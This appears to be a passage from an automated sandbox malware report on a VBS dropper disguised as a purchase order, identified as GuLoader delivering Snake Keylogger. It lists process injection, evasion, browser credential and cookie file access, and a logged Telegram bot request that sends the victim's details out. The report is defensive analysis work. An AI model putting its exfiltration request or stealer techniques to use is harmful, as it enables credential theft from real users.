              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836 Thread sleep time: -595253s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836 Thread sleep time: -595132s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836 Thread sleep time: -595031s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836 Thread sleep time: -594917s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836 Thread sleep time: -594812s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836 Thread sleep time: -594703s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 1836 Thread sleep time: -594593s >= -30000s
              Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
              Source: powershell.exe, 00000002.00000002.1532140806.0000028F6D030000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_029E8870 LdrInitializeThunk,5_2_029E8870

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe
              Source: Yara match File source: amsi64_7924.amsi.csv, type: OTHER
              Source: Yara match File source: Process Memory Space: powershell.exe PID: 7924, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: powershell.exe PID: 1516, type: MEMORYSTR
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\msiexec.exe base: 4260000
              Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformation
              Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
              Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Windows\SysWOW64\msiexec.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information

              Source: Yara match File source: 00000007.00000002.2618677308.00000000251F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
              Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
              Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
              Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
              Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Windows\SysWOW64\msiexec.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\

              Remote Access Functionality

              Source: Yara match File source: 00000007.00000002.2618677308.00000000251F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
              Gather Victim Identity Information | 221 Scripting | Valid Accounts | 1 Windows Management Instrumentation | 221 Scripting | 1 DLL Side-Loading | 3 Obfuscated Files or Information | 1 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 1 Archive Collected Data | 1 Web Service | Exfiltration Over Other Network Medium | Abuse Accessibility Features
              Credentials | Domains | Default Accounts | 1 Exploitation for Client Execution | 1 DLL Side-Loading | 311 Process Injection | 1 Software Packing | LSASS Memory | 13 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
              Email Addresses | DNS Server | Domain Accounts | 2 Command and Scripting Interpreter | Logon Script (Windows) | Logon Script (Windows) | 1 DLL Side-Loading | Security Account Manager | 1 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | 11 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact
              Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 1 Masquerading | NTDS | 1 Process Discovery | Distributed Component Object Model | Input Capture | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
              Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 21 Virtualization/Sandbox Evasion | LSA Secrets | 21 Virtualization/Sandbox Evasion | SSH | Keylogging | 14 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
              Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 311 Process Injection | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
              DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 1 System Network Configuration Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
              [Behavior graph: ID 1540334, Sample: Distribuciones Enelca Ja#U0..., Start date: 23/10/2024, Architecture: WINDOWS, Score: 100]

              Source | Detection | Scanner | Label | Link
              Distribuciones Enelca Ja#U00e9n, S.L. PEDIDO 456799.vbs | 18% | ReversingLabs | Script.Trojan.GuLoader |
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              Source | Detection | Scanner | Label | Link
              http://nuget.org/NuGet.exe | 0% | URL Reputation | safe |
              http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
              https://go.micro | 0% | URL Reputation | safe |
              https://contoso.com/License | 0% | URL Reputation | safe |
              https://contoso.com/Icon | 0% | URL Reputation | safe |
              http://checkip.dyndns.org/ | 0% | URL Reputation | safe |
              https://aka.ms/pscore6lB | 0% | URL Reputation | safe |
              https://contoso.com/ | 0% | URL Reputation | safe |
              https://nuget.org/nuget.exe | 0% | URL Reputation | safe |
              https://aka.ms/pscore68 | 0% | URL Reputation | safe |
              https://apis.google.com | 0% | URL Reputation | safe |
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              s-part-0044.t-0009.fb-t-msedge.net | 13.107.253.72 | true | false | | unknown
              drive.google.com | 142.250.185.206 | true | false | | unknown
              drive.usercontent.google.com | 142.250.185.65 | true | false | | unknown
              reallyfreegeoip.org | 188.114.96.3 | true | true | | unknown
              api.telegram.org | 149.154.167.220 | true | true | | unknown
              checkip.dyndns.com | 193.122.6.168 | true | false | | unknown
              checkip.dyndns.org | unknown | unknown | true | | unknown
              Name | Malicious | Antivirus Detection | Reputation
              https://reallyfreegeoip.org/xml/173.254.250.90 | false | | unknown
              http://checkip.dyndns.org/ | false | URL Reputation: safe | unknown
              https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:818225%0D%0ADate%20and%20Time:%2024/10/2024%20/%2003:15:28%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20818225%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | false | | unknown
              Name | Source | Malicious | Antivirus Detection | Reputation
              http://nuget.org/NuGet.exe | powershell.exe, 00000002.00000002.1522950843.0000028F64B54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1704835374.0000000005518000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              http://drive.usercontent.google.com | powershell.exe, 00000002.00000002.1497034651.0000028F56895000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
              http://pesterbdd.com/images/Pester.png | powershell.exe, 00000005.00000002.1688588153.0000000004608000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000005.00000002.1688588153.0000000004608000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
              https://go.micro | powershell.exe, 00000002.00000002.1497034651.0000028F55712000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              https://contoso.com/License | powershell.exe, 00000005.00000002.1704835374.0000000005518000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              https://contoso.com/Icon | powershell.exe, 00000005.00000002.1704835374.0000000005518000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              https://drive.googP | powershell.exe, 00000002.00000002.1497034651.0000028F56857000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
              https://drive.usercontent.googh | powershell.exe, 00000002.00000002.1497034651.0000028F56882000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
              http://drive.google.com | powershell.exe, 00000002.00000002.1497034651.0000028F5685C000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
              https://chrome.google.com/webstore?hl=en | msiexec.exe, 00000007.00000002.2618677308.00000000253A1000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
              https://chrome.google.com/webstore?hl=en8 | msiexec.exe, 00000007.00000002.2618677308.00000000253A1000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
              https://github.com/Pester/Pester | powershell.exe, 00000005.00000002.1688588153.0000000004608000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
              https://www.google.com | powershell.exe, 00000002.00000002.1497034651.0000028F56882000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F5685C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F5687E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F54F73000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
              https://aka.ms/pscore6lB | powershell.exe, 00000005.00000002.1688588153.00000000044B1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              https://contoso.com/ | powershell.exe, 00000005.00000002.1704835374.0000000005518000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                                                  https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.1522950843.0000028F64B54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1704835374.0000000005518000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://chrome.google.com/webstore?hl=enlBmsiexec.exe, 00000007.00000002.2618677308.00000000253AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    unknown
                                                    https://drive.google.compowershell.exe, 00000002.00000002.1497034651.0000028F54D07000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F56857000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      unknown
                                                      https://drive.usercontent.google.compowershell.exe, 00000002.00000002.1497034651.0000028F56882000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F54F77000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        unknown
                                                        https://aka.ms/pscore68powershell.exe, 00000002.00000002.1497034651.0000028F54AE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://apis.google.compowershell.exe, 00000002.00000002.1497034651.0000028F56882000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F5685C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F5687E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1497034651.0000028F54F73000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1497034651.0000028F54AE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1688588153.00000000044B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | true
142.250.185.206 | drive.google.com | United States | 15169 | GOOGLEUS | false
193.122.6.168 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false
188.114.96.3 | reallyfreegeoip.org | European Union | 13335 | CLOUDFLARENETUS | true
142.250.185.65 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1540334
Start date and time: 2024-10-23 17:21:58 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 39s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Distribuciones Enelca Ja#U00e9n, S.L. PEDIDO 456799.vbs
renamed because original name is a hash value
Original Sample Name: Distribuciones Enelca Jan, S.L. PEDIDO 456799.vbs
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winVBS@8/7@5/5
EGA Information: Failed
HCA Information:
• Successful, ratio: 94%
• Number of executed functions: 103
• Number of non-executed functions: 5
Cookbook Comments:
• Found application associated with file extension: .vbs
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): azurefd-t-fb-prod.trafficmanager.net, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target msiexec.exe, PID 4104 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 1516 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 7924 because it is empty
• Not all processes were analyzed, report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: Distribuciones Enelca Ja#U00e9n, S.L. PEDIDO 456799.vbs
Time | Type | Description
11:22:58 | API Interceptor | 87x Sleep call for process: powershell.exe modified
11:23:51 | API Interceptor | 4641x Sleep call for process: msiexec.exe modified
                                                                            Pedido de Cota#U00e7#U00e3o-24100004_lista comercial.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                            • 188.114.96.3
                                                                            https://email.email.pandadoc.net/c/eJxUkE9r4zwQxj-NdUuQR5ItHXQobfwG3rLQsmHbXspIGjeqE8m1FYfm0y-B7f65DcP8ht_zBOsa4XrNQvanI6XyGoPN-f7_7ilGN8iYdk8Pn-dxt_vOyNYtmMZwDpztLRpXK45GaGy9C943vK2NJgTDG-WQRQscZM1B1AJaztfS904pGYLuOTQtVZLTEeNhPWIKGLJfJyoszq9lQk_oDmTLdCJ2sPtSxrkSNxV0FXQ4jn8Qn48VdF_6FXQLVKIreaBUiTvSzgiJNQeJqLDhSoJpBAanJYFWrZO1kb6uRMdSLrGPHkvM6VqDaxuBBtpVCyBWEkW9wkbTCsko1-galQ4sT2-Y4uU39N85y5jEfDMn83C50P6beDlv2WTDe040V5K702Ggj9NhvKqziZY4_2J_iM3H6W67XV7Uop9j2dyq0D-yYr_S_TWuCk5v9M9mvl4sFtg5T8M8oqfrU_W4od1nvwdHIdy798HfDs_6ZwAAAP__1K2kLgGet hashmaliciousUnknownBrowse
                                                                            • 104.16.117.116
                                                                            044SqLy1H3.exeGet hashmaliciousLummaCBrowse
                                                                            • 188.114.97.3
                                                                            sample.pdfGet hashmaliciousHtmlDropperBrowse
                                                                            • 104.21.65.137
                                                                            https://email.email.pandadoc.net/c/eJxUkMtu2zoQhp9G3NkQhxQlLbRIjo8QpKjRS5qi3QTD4TCmZYuyRNm1nr4w0PSyGwzmG3z_7xprlPWVcJHmI_fpJbjmguOnLn78cm0vTw-4fw8_dttdENzIEmoji9oYsWsAtST2VKmiVOSoJqdyVNYa9pUnKUIDOWiZA0hTgDZrUNoXnphIopaly3TORwyH9YC9Qxdp3XMSYXpJIxKjPXCTxpnFodmlNEyZusugzaDFYfiDUDxm0L7pZ9CeIVNtih33mdpIlF4hGzaGIM8ta2mV83UNlbFYlJCbQhsoM9WKPqbgA2EKsb_VACXX1jKtlM9hpQHcqiKvVsZXuvB16WTBIo6v2IflN7T_8Ly_7-p6G_bz4wbM8n1Sp6MYG7ePPU-Zzu186Pg0H4abuhj5HKZfrF4mPLvT5vndMpR0h183E0MpUvOW7q9xlXB85X820-3i3IC4xLGbBiS-Pf3v-o2eUuge_l-21bG_2vt-fvz8MwAA__9XraZ6Get hashmaliciousUnknownBrowse
                                                                            • 104.16.117.116
                                                                            wRcmIT6Eji.exeGet hashmaliciousLummaCBrowse
                                                                            • 188.114.97.3
                                                                            qfq0JTpoq9.exeGet hashmaliciousLummaCBrowse
                                                                            • 188.114.97.3
                                                                            http://docusign.netGet hashmaliciousUnknownBrowse
                                                                            • 104.18.66.57
                                                                            W1WowSI1iG.exeGet hashmaliciousLummaCBrowse
                                                                            • 188.114.97.3
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:modified
                                                                            Size (bytes):8003
                                                                            Entropy (8bit):4.840877972214509
                                                                            Encrypted:false
                                                                            SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                                                            MD5:106D01F562D751E62B702803895E93E0
                                                                            SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                                                            SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                                                            SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                                                            Malicious:false
                                                                            Reputation:moderate, very likely benign file
                                                                            Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):64
                                                                            Entropy (8bit):1.1940658735648508
                                                                            Encrypted:false
                                                                            SSDEEP:3:Nlllultnxj:NllU
                                                                            MD5:F93358E626551B46E6ED5A0A9D29BD51
                                                                            SHA1:9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
                                                                            SHA-256:0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
                                                                            SHA-512:D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
                                                                            Malicious:false
                                                                            Reputation:moderate, very likely benign file
                                                                            Preview:@...e................................................@..........
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Reputation:high, very likely benign file
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):475152
                                                                            Entropy (8bit):5.95493854801058
                                                                            Encrypted:false
                                                                            SSDEEP:12288:oQClYe+BzomYTAmiZHqvgLCAtpYpRqsNj0E3pv+38c:LClYeWzWUm+JpYzDQE3U8c
                                                                            MD5:D43327229CAAC3F1C1C7443675EAA345
                                                                            SHA1:169D456A6122E6A39603F3017EB16DF162ACA251
                                                                            SHA-256:0144E44B033690C4D3387D5125A5A76003D371CA48116A53D1439F83D6B530D3
                                                                            SHA-512:DA4CDB914C5618CA83F4F97BF28D89899BC9459FF797B6F865488A7F446B56CEA77BBE37AEB2E89FB81937B6FA1929A2E6C9FECA5FA2EE32344F21E0DFF3A10D
                                                                            Malicious:false
                                                                            File type:ASCII text, with CRLF line terminators
                                                                            Entropy (8bit):4.859408857159323
                                                                            TrID:
                                                                            • Visual Basic Script (13500/0) 100.00%
